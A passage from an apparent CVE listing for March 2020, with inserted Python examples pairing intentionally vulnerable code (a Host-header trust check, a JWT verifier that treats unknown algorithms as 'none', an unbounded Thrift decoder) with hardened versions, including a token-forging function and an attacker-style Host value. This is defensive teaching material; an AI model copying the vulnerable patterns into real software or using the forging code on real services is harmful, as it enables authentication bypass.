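    """Combined hardened decision: reject unknown Host, then classify the peer."""
    if not host_is_allowed(req):
        return {"status": 400, "reason": "Host header not in allow-list"}
    return {"status": 200, "skip_auth": is_local_hardened(req), "env": ENVIRONMENT}


if __name__ == "__main__":
    forged = Request("203.0.113.5", {"host": "localhost.dev.attacker.example"})  # constructed
    print("vulnerable: local =", is_local_vulnerable(forged), "env =", environment_vulnerable(forged))
    print("hardened:  ", check_request(forged))
```

With the forged request both vulnerable checks are fooled (the peer is a public address, yet the server would skip authentication and switch into development mode), while the hardened path returns 400 before any of that logic runs. Behind a reverse proxy `peer_ip` is the proxy's address; in that deployment trust `X-Forwarded-For` only when the peer is one of your known proxies, and still never derive authorization or environment from `Host`.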
2020-03-20 CVE-2019-19324 Xmidt Always-Incorrect Control Flow Implementation vulnerability in Xmidt Cjwt 1.0.1

Xmidt cjwt through 1.0.1 before 2019-11-25 maps unsupported algorithms to alg=none, which sometimes leads to untrusted accidental JWT acceptance.

5.0
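The cjwt entry describes a verifier that maps any algorithm it does not recognise to `alg=none`, and then honours `none`, so a token with a made-up algorithm name and an empty signature is accepted. The block below is an added example, not cjwt's code: a minimal HS256 signer, a lenient verifier that reproduces that mapping, and a strict verifier whose algorithm allow-list is fixed by the verifier rather than read from the token. The key, the claims and the bogus algorithm name are constructed for illustration.

```python
"""JWT algorithm handling: the 'unsupported becomes none' failure beside a strict verifier.

Added example, not cjwt code. The key, claims and the bogus algorithm name
are constructed for illustration.
"""
import base64
import hashlib
import hmac
import json


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _hs256(key: bytes, signing_input: str) -> bytes:
    return hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()


def sign_hs256(claims: dict, key: bytes) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    signing_input = f"{header}.{payload}"
    return f"{signing_input}.{_b64url(_hs256(key, signing_input))}"


def forge_token(claims: dict, alg: str) -> str:
    """Attacker-built token: chosen alg name, empty signature segment."""
    header = _b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    return f"{header}.{payload}."


def verify_lenient(token: str, key: bytes) -> dict:
    """Mirrors the bug: an algorithm the library does not support is treated as
    alg=none, and alg=none means there is no signature to check."""
    head, payload, sig = token.split(".")
    alg = json.loads(_b64url_decode(head)).get("alg")
    if alg not in ("HS256", "none"):
        alg = "none"                                   # the fatal mapping
    if alg == "none":
        return json.loads(_b64url_decode(payload))     # accepted unsigned
    if not hmac.compare_digest(_hs256(key, f"{head}.{payload}"), _b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload))


def verify_strict(token: str, key: bytes, allowed_algs=("HS256",)) -> dict:
    """The verifier owns the algorithm allow-list; the token's alg must match it
    exactly, 'none' is never acceptable, and an unknown alg is a hard failure."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    head, payload, sig = parts
    alg = json.loads(_b64url_decode(head)).get("alg")
    if alg == "none" or alg not in allowed_algs:       # explicit 'none' check as belt and braces
        raise ValueError(f"algorithm not allowed: {alg!r}")
    if not sig:
        raise ValueError("missing signature")
    if not hmac.compare_digest(_hs256(key, f"{head}.{payload}"), _b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload))


def strict_rejects(token: str, key: bytes) -> bool:
    """True when verify_strict refuses the token (any ValueError, incl. bad base64/JSON)."""
    try:
        verify_strict(token, key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    key = b"constructed-demo-key"
    forged = forge_token({"sub": "alice", "admin": True}, "ES999")
    print("lenient accepts:", verify_lenient(forged, key))
    print("strict rejects: ", strict_rejects(forged, key))
```

The strict verifier also ties the key to the algorithm: it only ever computes HMAC-SHA256, so a token that claims `RS256` cannot trick it into using a public key as an HMAC secret, the other well-known algorithm-confusion attack. In a real deployment the allow-list is per issuer and the key is looked up by `kid`, never chosen from anything else in the token.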
2020-03-20 CVE-2019-15075 Inextrix USE of Cryptographically Weak Pseudo-Random Number Generator (Prng) vulnerability in Inextrix Astpp

An issue was discovered in iNextrix ASTPP before 4.0.1.

5.0
2020-03-20 CVE-2019-14855 Gnupg, Fedoraproject USE of A Broken OR Risky Cryptographic Algorithm vulnerability in multiple products

A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm.

5.0
2020-03-20 CVE-2019-18785 Suitecrm Insufficiently Protected Credentials vulnerability in Suitecrm

SuiteCRM 7.10.x prior to 7.10.21 and 7.11.x prior to 7.11.9 mishandles API access tokens and credentials.

5.0
2020-03-20 CVE-2019-18782 Salesagility Unspecified vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x prior to 7.10.21 and 7.11.x prior to 7.11.9 does not correctly implement the .htaccess protection mechanism.

5.0
2020-03-20 CVE-2018-20333 Asus Information Exposure vulnerability in Asus Asuswrt 3.0.0.4.384.20308

An issue was discovered in ASUSWRT 3.0.0.4.384.20308.

5.0
2020-03-20 CVE-2019-16108 Phpbb Code Injection vulnerability in PHPbb 3.2.7

phpBB 3.2.7 allows adding an arbitrary Cascading Style Sheets (CSS) token sequence to a page through BBCode.

5.0
2020-03-19 CVE-2020-10669 Canon Improper Authentication vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to authentication bypass on the page /home.jsp.

5.0
2020-03-19 CVE-2019-16529 Mediawiki Unspecified vulnerability in Mediawiki Checkuser

An issue was discovered in the CheckUser extension through 1.35.0 for MediaWiki.

5.0
2020-03-19 CVE-2019-16063 Netsas Missing Encryption of Sensitive Data vulnerability in Netsas Enigma Network Management Solution

NETSAS Enigma NMS 65.0.0 and prior does not encrypt sensitive data rendered within web pages.

5.0
2020-03-19 CVE-2019-16067 Netsas Cleartext Transmission of Sensitive Information vulnerability in Netsas Enigma Network Management Solution

NETSAS Enigma NMS 65.0.0 and prior utilises basic authentication over HTTP for enforcing access control to the web application.

5.0
2020-03-19 CVE-2019-15656 D Link Cleartext Storage of Sensitive Information vulnerability in D-Link Dsl-2875Al Firmware and Dsl-2877Al Firmware

D-Link DSL-2875AL and DSL-2877AL devices through 1.00.05 are prone to information disclosure via a simple crafted request to index.asp on the web management server because of username_v and password_v variables.

5.0
2020-03-19 CVE-2019-15655 D Link Insufficiently Protected Credentials vulnerability in D-Link Dsl-2875Al Firmware

D-Link DSL-2875AL devices through 1.00.05 are prone to password disclosure via a simple crafted /romfile.cfg request to the web management server.

5.0
2020-03-19 CVE-2019-15654 Comba Insufficiently Protected Credentials vulnerability in Comba Ap2600-I - A02 - 0202N00Pd2 Firmware

Comba AC2400 devices are prone to password disclosure via a simple crafted /09/business/upgrade/upcfgAction.php?download=true request to the web management server.

5.0
2020-03-19 CVE-2019-15653 Comba Insufficiently Protected Credentials vulnerability in Comba Ap2600-I - A02 - 0202N00Pd2 Firmware

Comba AP2600-I devices through A02,0202N00PD2 are prone to password disclosure via an insecure authentication mechanism.

5.0
2020-03-19 CVE-2020-10675 Jsonparser Project Infinite Loop vulnerability in Jsonparser Project Jsonparser 20191204

The Library API in buger jsonparser through 2019-12-04 allows attackers to cause a denial of service (infinite loop) via a Delete call.

5.0
2020-03-18 CVE-2019-3762 Dell Improper Certificate Validation vulnerability in Dell products

Data Protection Central versions 1.0, 1.0.1, 18.1, 18.2, and 19.1 contains an Improper Certificate Chain of Trust Vulnerability.

5.0
2020-03-18 CVE-2019-20529 Frappe Information Exposure vulnerability in Frappe 11.0.0/12.0.0

In core/doctype/prepared_report/prepared_report.py in Frappe 11 and 12, data files generated with Prepared Report were being stored as public files (no authentication is required to access; having a link is sufficient) instead of private files.

5.0
2020-03-18 CVE-2019-12121 Onap Missing Encryption of Sensitive Data vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was detected in ONAP Portal through Dublin.

5.0
2020-03-18 CVE-2020-9326 Beyondtrust Improper Input Validation vulnerability in Beyondtrust Privilege Management FOR Windows and mac

BeyondTrust Privilege Management for Windows and Mac (aka PMWM; formerly Avecto Defendpoint) 5.1 through 5.5 before 5.5 SR1 mishandles command-line arguments with PowerShell .ps1 file extensions present, leading to a DefendpointService.exe crash.

5.0
2020-03-18 CVE-2019-10682 Django Nopassword Project Insufficiently Protected Credentials vulnerability in Django-Nopassword Project Django-Nopassword

django-nopassword before 5.0.0 stores cleartext secrets in the database.

5.0
2020-03-18 CVE-2020-9325 Aquaforest Improper Input Validation vulnerability in Aquaforest Tiff Server 4.0

Aquaforest TIFF Server 4.0 allows Unauthenticated Arbitrary File Download.

5.0
2020-03-18 CVE-2020-9324 Aquaforest Insufficiently Protected Credentials vulnerability in Aquaforest Tiff Server 4.0

Aquaforest TIFF Server 4.0 allows Unauthenticated SMB Hash Capture via UNC.

5.0
2020-03-18 CVE-2020-9323 Aquaforest Information Exposure vulnerability in Aquaforest Tiff Server 4.0

Aquaforest TIFF Server 4.0 allows Unauthenticated File and Directory Enumeration via tiffserver/tssp.aspx.

5.0
2020-03-18 CVE-2019-11939 Facebook Allocation of Resources Without Limits OR Throttling vulnerability in Facebook Thrift

Golang Facebook Thrift servers would not error upon receiving messages declaring containers of sizes larger than the payload.

5.0
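The Thrift entry (CVE-2019-11939) is a length-prefix trust problem: the decoder sized a container from the count the message declared, without first asking whether that many elements could possibly fit in the bytes that followed. The block below is an added example, not Facebook Thrift code, using a small assumed wire format (big-endian u32 count, then that many big-endian i32 elements) so it runs stand-alone; it measures how much memory the vulnerable decoder reserves for an 8-byte message and shows the two checks the hardened decoder performs before allocating anything.

```python
"""Declared container size vs. bytes actually present.

Added example, not Facebook Thrift code. The wire format (big-endian u32
count, then that many big-endian i32 elements) and the element ceiling are
assumptions chosen to keep the example self-contained.
"""
import struct
import tracemalloc

U32 = struct.Struct(">I")
I32 = struct.Struct(">i")
MAX_ELEMENTS = 100_000   # hard ceiling independent of payload size (assumed policy)


def encode_i32_list(values) -> bytes:
    return U32.pack(len(values)) + b"".join(I32.pack(v) for v in values)


def decode_vulnerable(buf: bytes) -> list:
    """Allocates from the declared count alone; a 4-byte header can reserve gigabytes."""
    (count,) = U32.unpack_from(buf, 0)
    out = [0] * count                                # attacker-sized allocation
    for i in range(count):                           # struct.error once the payload ends
        (out[i],) = I32.unpack_from(buf, U32.size + I32.size * i)
    return out


def decode_hardened(buf: bytes) -> list:
    """Refuse before allocating: ceiling first, then declared bytes <= remaining bytes."""
    if len(buf) < U32.size:
        raise ValueError("truncated header")
    (count,) = U32.unpack_from(buf, 0)
    remaining = len(buf) - U32.size
    if count > MAX_ELEMENTS:
        raise ValueError(f"declared {count} elements, ceiling is {MAX_ELEMENTS}")
    # Division form: in C or Go, count * size could overflow while this cannot.
    if count > remaining // I32.size:
        raise ValueError(f"declared {count} elements but only {remaining} bytes follow")
    body = buf[U32.size:U32.size + count * I32.size]
    return [v for (v,) in I32.iter_unpack(body)]


def hardened_rejects(buf: bytes) -> bool:
    try:
        decode_hardened(buf)
    except ValueError:
        return True
    return False


def peak_bytes(decoder, buf: bytes) -> int:
    """Peak Python heap usage while decoding buf, whether or not the decoder raises."""
    tracemalloc.start()
    try:
        decoder(buf)
    except (struct.error, ValueError):
        pass
    _, peak = tracemalloc.get_traced_memory()
    tracemalloc.stop()
    return peak


if __name__ == "__main__":
    lying = U32.pack(2_000_000) + I32.pack(7)      # constructed: 8 bytes claiming 8 MB of elements
    print("vulnerable peak bytes:", peak_bytes(decode_vulnerable, lying))
    print("hardened peak bytes:  ", peak_bytes(decode_hardened, lying))
```

Two checks are needed, not one: the byte-count comparison stops a tiny frame from reserving memory it cannot fill, and the fixed ceiling stops a legitimately large frame from being used as an amplifier when elements are variable-length and the declared count cannot be bounded by the payload alone.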
2020-03-17 CVE-2020-10116 Cpanel Incorrect Authorization vulnerability in Cpanel

cPanel before 84.0.20 allows attackers to bypass intended restrictions on features and demo accounts via WebDisk UAPI calls (SEC-541).

5.0
2020-03-17 CVE-2018-18576 Incsub Path Traversal vulnerability in Incsub Hustle

The Hustle (aka wordpress-popup) plugin through 6.0.5 for WordPress allows Directory Traversal to obtain a directory listing via the views/admin/dashboard/ URI.

5.0
2020-03-16 CVE-2020-8787 Salesagility Improper Input Validation vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow for an invalid Bean ID to be submitted.

5.0
2020-03-16 CVE-2019-20191 Sync XXE vulnerability in Sync products

Oxygen XML Editor 21.1.1 allows XXE to read any file.

5.0
2020-03-16 CVE-2020-7248 Openwrt Out-Of-Bounds Write vulnerability in Openwrt

libubox in OpenWrt before 18.06.7 and 19.x before 19.07.1 has a tagged binary data JSON serialization vulnerability that may cause a stack based buffer overflow.

5.0
2020-03-16 CVE-2017-12842 Bitcoin Improper Input Validation vulnerability in Bitcoin Core

Bitcoin Core before 0.14 allows an attacker to create an ostensibly valid SPV proof for a payment to a victim who uses an SPV wallet, even if that payment did not actually occur.

5.0
2020-03-16 CVE-2020-9321 Containous Improper Certificate Validation vulnerability in Containous Traefik

configurationwatcher.go in Traefik 2.x before 2.1.4 and TraefikEE 2.0.0 mishandles the purging of certificate contents from providers before logging.

5.0
2020-03-16 CVE-2020-6582 Nagios Out-Of-Bounds Write vulnerability in Nagios Remote Plug in Executor 3.2.1

Nagios NRPE 3.2.1 has a Heap-Based Buffer Overflow, as demonstrated by interpretation of a small negative number as a large positive number during a bzero call.

5.0
2020-03-16 CVE-2020-5849 Unraid Improper Authentication vulnerability in Unraid 6.8.0

Unraid 6.8.0 allows authentication bypass.

5.0
2020-03-16 CVE-2019-19945 Openwrt Incorrect Conversion Between Numeric Types vulnerability in Openwrt

uhttpd in OpenWrt through 18.06.5 and 19.x through 19.07.0-rc2 has an integer signedness error.

5.0
2020-03-16 CVE-2020-6988 Rockwellautomation Improper Authentication vulnerability in Rockwellautomation products

Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A (all versions), MicroLogix 1100 Controller (all versions), and RSLogix 500 Software v12.001 and prior: a remote, unauthenticated attacker can send a request from the RSLogix 500 software to the victim's MicroLogix controller.

5.0
2020-03-16 CVE-2020-6984 Rockwellautomation USE of A Broken OR Risky Cryptographic Algorithm vulnerability in Rockwellautomation products

Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A (all versions), MicroLogix 1100 Controller (all versions), and RSLogix 500 Software v12.001 and prior: the cryptographic function utilized to protect the password in MicroLogix is discoverable.

5.0
2020-03-16 CVE-2020-10240 Joomla Improper Input Validation vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

5.0
2020-03-16 CVE-2020-10238 Joomla Exposure of Resource TO Wrong Sphere vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

5.0
2020-03-16 CVE-2019-19942 Swisscom Improper Input Validation vulnerability in Swisscom Centro Business and Centro Grande Firmware

Missing output sanitation in Swisscom Centro Grande before 6.16.12, Centro Business 1.0 (ADB) before 7.10.18, and Centro Business 2.0 before 8.02.04 allows a remote attacker to perform DNS spoofing against the web interface via crafted hostnames in DHCP requests.

5.0
2020-03-16 CVE-2019-19209 Dolibarr SQL Injection vulnerability in Dolibarr

Dolibarr ERP/CRM before 10.0.3 allows SQL Injection.

5.0
2020-03-16 CVE-2018-13063 Easyappointments Missing Authorization vulnerability in Easyappointments Easy!Appointments

Easy!Appointments 1.3.0 has a Missing Authorization issue allowing retrieval of hashed passwords and salts.

5.0
2020-03-16 CVE-2018-13060 Easyappointments Improper Authentication vulnerability in Easyappointments Easy!Appointments

Easy!Appointments 1.3.0 has a Guessable CAPTCHA issue.

5.0
2020-03-16 CVE-2020-9518 Microfocus Information Exposure vulnerability in Microfocus Service Manager

Login filter can access configuration files vulnerability in Micro Focus Service Manager (Web Tier), affecting versions 9.50, 9.51, 9.52, 9.60, 9.61, 9.62.

5.0
2020-03-16 CVE-2020-9519 Microfocus Information Exposure vulnerability in Microfocus Service Manager

HTTP methods revealed in Web services vulnerability in Micro Focus Service Manager (server), affecting versions 9.40, 9.41, 9.50, 9.51, 9.52, 9.60, 9.61, 9.62, 9.63.

5.0
2020-03-17 CVE-2019-20496 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows attackers to conduct arbitrary chown operations as root during log processing (SEC-532).

4.9
2020-03-20 CVE-2020-8140 Nextcloud Code Injection vulnerability in Nextcloud

A code injection in Nextcloud Desktop Client 2.6.2 for macOS allowed arbitrary code to be loaded when the client was started with DYLD_INSERT_LIBRARIES set in the environment.

4.6
2020-03-20 CVE-2020-1796 Huawei Incorrect Authorization vulnerability in Huawei Mate 20 Firmware and Mate 30 PRO Firmware

There is an improper authorization vulnerability in several smartphones.

4.6
2020-03-20 CVE-2020-1709 Redhat Improper Privilege Management vulnerability in Redhat Openshift

A vulnerability was found in all openshift/mediawiki 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the openshift/mediawiki.

4.6
2020-03-20 CVE-2020-10597 Insulet Incorrect Authorization vulnerability in Insulet Omnipod Insulin Management System Firmware

Delta Industrial Automation DOPSoft, Version 4.00.08.15 and prior.

4.6
2020-03-20 CVE-2019-19345 Redhat Improper Privilege Management vulnerability in Redhat Openshift

A vulnerability was found in all openshift/mediawiki-apb 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the container openshift/mediawiki-apb.

4.6
2020-03-18 CVE-2019-18979 Claranova Unspecified vulnerability in Claranova Adaware Antivirus 12.6.1005.11662/12.7.1055.0

Adaware antivirus 12.6.1005.11662 and 12.7.1055.0 has a quarantine flaw that allows privilege escalation.

4.6
2020-03-16 CVE-2020-7608 Yargs Improper Input Validation vulnerability in Yargs Yargs-Parser

yargs-parser could be tricked into adding or modifying properties of Object.prototype using a "__proto__" payload.

4.6
2020-03-16 CVE-2020-3948 Vmware Improper Privilege Management vulnerability in VMWare Fusion and Workstation

Linux Guest VMs running on VMware Workstation (15.x before 15.5.2) and Fusion (11.x before 11.5.2) contain a local privilege escalation vulnerability due to improper file permissions in Cortado Thinprint.

4.6
2020-03-20 CVE-2020-1707 Redhat Improper Privilege Management vulnerability in Redhat Openshift

A vulnerability was found in all openshift/postgresql-apb 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the container openshift/postgresql-apb.

4.4
2020-03-19 CVE-2020-1705 Redhat Improper Privilege Management vulnerability in Redhat Template Service Broker Operator 4.0.0/4.2.0

A vulnerability was found in openshift/template-service-broker-operator in all 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the openshift/template-service-broker-operator.

4.4
2020-03-18 CVE-2019-19355 Redhat Improper Privilege Management vulnerability in Redhat Openshift 4.0

An insecure modification vulnerability in the /etc/passwd file was found in the openshift/ocp-release-operator-sdk.

4.4
2020-03-18 CVE-2019-19351 Redhat Improper Privilege Management vulnerability in Redhat Openshift 3.11/4.0

An insecure modification vulnerability in the /etc/passwd file was found in the container openshift/jenkins.

4.4
2020-03-22 CVE-2020-10812 Hdfgroup Null Pointer Dereference vulnerability in Hdfgroup Hdf5

An issue was discovered in HDF5 through 1.12.0.

4.3
2020-03-22 CVE-2020-10811 Hdfgroup Out-Of-Bounds Read vulnerability in Hdfgroup Hdf5

An issue was discovered in HDF5 through 1.12.0.

4.3
2020-03-22 CVE-2020-10810 Hdfgroup Null Pointer Dereference vulnerability in Hdfgroup Hdf5

An issue was discovered in HDF5 through 1.12.0.

4.3
2020-03-22 CVE-2020-10809 Hdfgroup Out-Of-Bounds Write vulnerability in Hdfgroup Hdf5

An issue was discovered in HDF5 through 1.12.0.

4.3
2020-03-20 CVE-2019-18860 Squid Cache Injection vulnerability in Squid-Cache Squid

Squid before 4.9, when certain web browsers are used, mishandles HTML in the host (aka hostname) parameter to cachemgr.cgi.

4.3
2020-03-20 CVE-2019-13463 Quantumcloud Cross-Site Scripting vulnerability in Quantumcloud Simple Link Directory

An XSS vulnerability in qcopd-shortcode-generator.php in the Simple Link Directory plugin before 7.3.5 for WordPress allows remote attackers to inject arbitrary web script or HTML, because esc_html is not called for the "echo get_the_title()" or "echo $term->name" statement.

4.3
2020-03-20 CVE-2020-8883 Foxitsoftware Out-Of-Bounds Read vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916.

4.3
2020-03-20 CVE-2020-8879 Foxitsoftware Out-Of-Bounds Read vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916.

4.3
2020-03-20 CVE-2020-8877 Foxitsoftware Out-Of-Bounds Read vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916.

4.3
2020-03-20 CVE-2019-13389 Rainloop Cross-Site Scripting vulnerability in Rainloop Webmail

RainLoop Webmail before 1.13.0 lacks XSS protection mechanisms such as xlink:href validation, the X-XSS-Protection header, and the Content-Security-Policy header.

4.3
2020-03-20 CVE-2019-10221 Redhat, Dogtagpki Cross-Site Scripting vulnerability in multiple products

A Reflected Cross Site Scripting vulnerability was found in all pki-core 10.x.x versions, where the pki-ca module from the pki-core server.

4.3
2020-03-20 CVE-2019-10179 Redhat, Dogtagpki Cross-Site Scripting vulnerability in multiple products

A vulnerability was found in all pki-core 10.x.x versions, where the Key Recovery Authority (KRA) Agent Service did not properly sanitize recovery request search page, enabling a Reflected Cross Site Scripting (XSS) vulnerability.

4.3
2020-03-20 CVE-2020-9345 Signotec Allocation of Resources Without Limits OR Throttling vulnerability in Signotec Signopad-Api/Web

An issue was discovered in signotec signoPAD-API/Web (formerly Websocket Pad Server) before 3.1.1 on Windows.

4.3
2020-03-20 CVE-2020-9344 Atlassian Cross-Site Scripting vulnerability in Atlassian Subversion Application Lifecycle Management

Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.

4.3
2020-03-20 CVE-2020-9343 Signotec Improper Input Validation vulnerability in Signotec Signopad-Api/Web

An issue was discovered in signotec signoPAD-API/Web (formerly Websocket Pad Server) before 3.1.1 on Windows.

4.3
2020-03-19 CVE-2019-16069 Netsas Cross-Site Scripting vulnerability in Netsas Enigma Network Management Solution

A number of stored Cross-site Scripting (XSS) vulnerabilities were identified in NETSAS Enigma NMS 65.0.0 and prior that could allow a threat actor to inject malicious code directly into the application through the SNMP protocol.

4.3
2020-03-19 CVE-2020-10670 Canon Cross-Site Scripting vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Reflected XSS in the parameter settingId of the settingDialogContent.jsp page.

4.3
2020-03-19 CVE-2020-10668 Canon Cross-Site Scripting vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Reflected XSS in /home.jsp.

4.3
2020-03-19 CVE-2020-10667 Canon Cross-Site Scripting vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Stored XSS in /TemplateManager/indexExternalLocation.jsp.

4.3
2020-03-19 CVE-2019-15539 Mantisbt Cross-Site Scripting vulnerability in Mantisbt

The proj_doc_edit_page.php Project Documentation feature in MantisBT before 2.21.3 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary code (if CSP settings permit it) after uploading an attachment with a crafted filename.

4.3
2020-03-19 CVE-2019-15124 Mediawiki Cross-Site Scripting vulnerability in Mediawiki Mobilefrontend 1.31.0/1.32.0/1.33.0

In the MobileFrontend extension for MediaWiki, XSS exists within the edit summary field of the watchlist feed.

4.3
2020-03-19 CVE-2019-20526 Igniterealtime Cross-Site Scripting vulnerability in Igniterealtime Openfire 4.4.1

Ignite Realtime Openfire 4.4.1 allows XSS via the setup/setup-datasource-standard.jsp password parameter.

4.3
2020-03-19 CVE-2019-20525 Igniterealtime Cross-Site Scripting vulnerability in Igniterealtime Openfire 4.4.1

Ignite Realtime Openfire 4.4.1 allows XSS via the setup/setup-datasource-standard.jsp driver parameter.

4.3
2020-03-19 CVE-2019-20521 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the api/ URI.

4.3
2020-03-19 CVE-2019-20520 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the api/method/ URI.

4.3
2020-03-19 CVE-2019-20519 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the user/ URI, as demonstrated by a crafted e-mail address.

4.3
2020-03-19 CVE-2019-20518 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the project/ URI.

4.3
2020-03-19 CVE-2019-20517 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the contact/ URI.

4.3
2020-03-19 CVE-2019-20516 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the blog/ URI.

4.3
2020-03-19 CVE-2019-20515 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the addresses/ URI.

4.3
2020-03-19 CVE-2019-20514 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the address/ URI.

4.3
2020-03-19 CVE-2019-20513 EDX Cross-Site Scripting vulnerability in EDX Open EDX 20190315

Open edX Ironwood.1 allows support/certificates?user= reflected XSS.

4.3
2020-03-19 CVE-2019-16070 Netsas Cross-Site Scripting vulnerability in Netsas Enigma Network Management Solution

A number of stored Cross-site Scripting (XSS) vulnerabilities were identified in NETSAS Enigma NMS 65.0.0 and prior that could allow a threat actor to inject malicious code directly into the application through web application form inputs.

4.3
2020-03-19 CVE-2019-12416 Apache Injection vulnerability in Apache Deltaspike

Two injection attacks against the DeltaSpike windowhandler.js were reported.

4.3
2020-03-19 CVE-2019-20527 Igniterealtime Cross-Site Scripting vulnerability in Igniterealtime Openfire 4.4.1

Ignite Realtime Openfire 4.4.1 allows XSS via the setup/setup-datasource-standard.jsp serverURL parameter.

4.3
2020-03-19 CVE-2019-20524 Ilch Cross-Site Scripting vulnerability in Ilch CMS 2.1.23

ilchCMS 2.1.23 allows XSS via the index.php/partner/index Banner parameter.

4.3
2020-03-19 CVE-2019-20523 Ilch Cross-Site Scripting vulnerability in Ilch CMS 2.1.23

ilchCMS 2.1.23 allows XSS via the index.php/partner/index Name parameter.

4.3
2020-03-19 CVE-2019-20522 Ilch Cross-Site Scripting vulnerability in Ilch CMS 2.1.23

ilchCMS 2.1.23 allows XSS via the index.php/partner/index Link parameter.

4.3
2020-03-19 CVE-2019-19336 Ovirt, Redhat Cross-Site Scripting vulnerability in multiple products

A cross-site scripting vulnerability was reported in the oVirt-engine's OAuth authorization endpoint before version 4.3.8.

4.3
2020-03-18 CVE-2019-20528 Igniterealtime Cross-Site Scripting vulnerability in Igniterealtime Openfire 4.4.1

Ignite Realtime Openfire 4.4.1 allows XSS via the setup/setup-datasource-standard.jsp username parameter.

4.3
2020-03-18 CVE-2019-20512 Open EDX Cross-Site Scripting vulnerability in Open.Edx Ironwood .1

Open edX Ironwood.1 allows support/certificates?course_id= reflected XSS.

4.3
2020-03-18 CVE-2019-20511 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows blog?blog_category= Frame Injection.

4.3
2020-03-18 CVE-2019-12921 Graphicsmagick Information Exposure vulnerability in Graphicsmagick

In GraphicsMagick before 1.3.32, the text filename component allows remote attackers to read arbitrary files via a crafted image because of TranslateTextEx for SVG.

4.3
2020-03-18 CVE-2019-12370 Readdle Cross-Site Scripting vulnerability in Readdle Spark 2.0.2

The Spark application through 2.0.2 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12369 Typeapp Cross-Site Scripting vulnerability in Typeapp 1.9.5.35

The TypeApp application through 1.9.5.35 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12368 Edison Cross-Site Scripting vulnerability in Edison Mail 1.7.1

The Edison Mail application through 1.7.1 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12367 Blixhq Cross-Site Scripting vulnerability in Blixhq Bluemail 1.9.5.36

The BlueMail application through 1.9.5.36 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12366 9Folders Cross-Site Scripting vulnerability in 9Folders Nine 4.5.3A

The Nine application through 4.5.3a for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12365 Cloudmagic Cross-Site Scripting vulnerability in Cloudmagic Newton 10.0.23

